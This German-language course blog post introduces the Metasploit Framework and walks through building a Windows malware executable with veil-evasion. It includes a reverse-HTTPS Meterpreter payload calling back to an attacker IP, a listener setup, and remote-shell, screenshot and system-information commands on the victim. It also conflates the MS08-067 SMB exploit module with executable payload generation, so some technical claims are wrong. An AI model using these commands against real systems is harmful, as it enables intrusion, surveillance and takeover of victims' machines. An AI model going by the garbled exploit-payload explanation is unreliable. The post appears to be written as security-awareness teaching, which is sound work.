CAS Information Security & Risk Management 2018: MetaSploit-Framework

MetaSploit by Simon Meier im CAS Information & Risk Management. Studiengangleitung Prof. Dalla Vecchia

Back-to-School: Aus dem Klassenzimmer des CAS Information Security & Risk Management. Basis für diesen Lehrgang ist das BSI-Grundschutzhandbuch, und die Teilnehmenden bereiten sich begleitend auf die CISSP-Prüfung vor. Ein weiterer Teil des 15-tägigen Lehrgangs ist es, ein CISSP- oder BSI-Fachthema als Blogpost aufzubereiten:

MetaSploit-Framework: Einführung in das „Hacking-Tool“

Das Erstellen von Viren und Malware ist mit dem „Hacking-Tool“ MetaSploit-Framework kinderleicht und erfordert keine grossen IT-Kenntnisse.

Das MetaSploit-Framework entstand aus dem Open-Source-Projekt „Metasploit-Projekt“ der Entwicklergruppe „Rapid7“. Das Ziel des Projekts war es, ein Framework zu entwickeln, das unter anderem bekannte Informationen über Sicherheitslücken bietet, und anhand dieser Informationen Penetrationstests durchzuführen.

Dass so ein Framework auch von sogenannten „Scriptkiddies“ missbraucht werden kann, liegt auf der Hand. Eine Malware ist damit im Handumdrehen erstellt und kann dann beispielsweise in einer Mail als getarntes Word-Dokument verschickt werden. Kein Wunder also, dass sich aufgrund dieses Open-Source-Framework solche Malware-Angriffe häufen.

Zugang auf ein System in drei Schritten:

Das Erstellen und Anwenden einer Malware mithilfe des MetaSploit-Framework gliedert sich in folgende Schritte:

  1. Die Verwundbarkeit (der Exploit) kann ausgewählt werden.Dies können typische Verwundbarkeiten in Microsoft Windows, Adobe Flashplayer, Oracle Java etc. sein. Im nachstehenden Beispiel wurde die Verwundbarkeit ausgewählt, die mit dem Microsoft Patch MS08-067 korrigiert würde.
  1. Als Nächstes sucht man sich den gewünschten Payload aus.
    Der Payload ist der Schadcode, der auf dem Zielsystem ausgeführt wird.
    In untenstehendem Beispiel wurde der Payload ausgewählt, der beim Ausführen der Malware eine „HTTPS Reverse-Session“ öffnet und somit von „innen“ (vom Zielsystem) nach „aussen“ eine verschlüsselte HTTPS- Verbindung aufbaut, die den „Vorteil“ hat, von Firewalls und IPS-Systemen kaum erkannt zu werden, da die Verbindungen nach aussen meist weniger stark kontrolliert werden.
  2. Die Malware wird ausgeführt.
    Wird die Malware effektiv vom Zielsystem ausgeführt (und ist der Microsoft Patch MS08-067 auf dem Zielsystem nicht installiert), öffnet sich zwischen Ziel- und Sourcesystem eine Session, die dann beispielsweise vom Angreifer dazu verwendet werden kann, Aktionen auf dem System zu tätigen. Da das lokale Ausführen von Executables, resp. solcher Malware meist nur mithilfe eines lokalen Administrator abgewickelt werden kann, hat der Angreifer im besten Falle lokale Administratorrechte.Verschafft sich der Angreifer dann mittels lateral movement Zugang zu weiteren Netzwerksystemen, beispielsweise zum Domain Controller, kann er schlussendlich die Kontrolle über ein ganzes Unternehmen erlangen, vorausgesetzt es gelingt ihm, auf einem ungepatchten System eine Malware auszuführen.

 

Praktisches Beispiel auf einer Kali-Linux Distribution:

Werden die untenstehenden Befehle auf einer Kali-Linux Distribution ausgeführt, wird die vorhin erwähnte Malware generiert. Das nachstehende Beispiel sollte stets nur in einer geschützten Umgebung (z.B. nur zwischen zwei lokalen virtuellen Maschinen) nachgestellt werden, damit auch der Internet-Provider nicht bei  diesen Tests mitliest.

Mit der veil-evasion Funktion aus dem MetaSploit-Framework wird die Malware mit folgenden Commands generiert:

veil-evasion
show payloads
use windows/smb/ms08_067_netapi

set lhost 192.168.206.128
set lport 443
generate

 

Im Anschluss müssen der Payloadname und die Anzahl Payloads angegeben werden:

TEST_CAS_IT_Security_2018
enter number: 1

 

Die Malware wird bei Standardsettings in folgendem Verzeichnis abgelegt:

/var/lib/veil-evasion/output/compiled/TEST_CAS_IT_Security_2018.exe

 

Nun kann auf das Ausführen der Malware „gehört“ werden:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.206.128

set LPORT 443
set ExitOnSession false

exploit -j

 

Wird die Malware ausgeführt, wird eine neue Session geöffnet, auf die dann verbunden werden kann:

sessions -i 1

 

Nun wird eine Remote Shell geöffnet und man kann sich beliebige Informationen aus dem System lesen, einen Screenshot vom Zielsystem erstellen lassen, eine Windows Shell öffnen etc.:

sysinfo
use espia
screengrab
sysinfo
shell

….

 

CAS Information Security & Risk Management: Hashtags / Domains

#CISSP  #BSI  #Securityframework  #securityawareness  #cybersecurity  #intrusionprevention #risikoanalyse  #desasterrecovery  #businesscontinuity  #BSI200  #iso27000  #securitymodels  #identitycontrol  #accesscontrol  #sqlinjection  #mobilecommunication #voip  #angriffsmethoden  #darkweb


Blogpost wurde erstellt von Simon Meier
im Rahmen vom CAS Information Security & Risk Management.

Dozenten in diesem sehr praxisorientierten Lehrgang sind:
Lukas Fässler (FSDZ Rechtsanwälte & Notariat AG)
Rainer Kessler (Governance Concept GmbH),
Andreas Wisler (goSecurity GmbH)

Beim nächsten CAS live dabei sein?
Hier der Link zur Ausschreibung CAS Information Security & Risk Management
Der CAS findet in der Regel zweimal im Jahr statt. Starttermine: März & September

Persönliche Beratung für den Lehrgang gewünscht?
Einfach Prof. Martina Dalla Vecchia ein E-Mail schreiben und einen Termin vorschlagen.

Hinterlasse eine Antwort

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind markiert *

Captcha loading...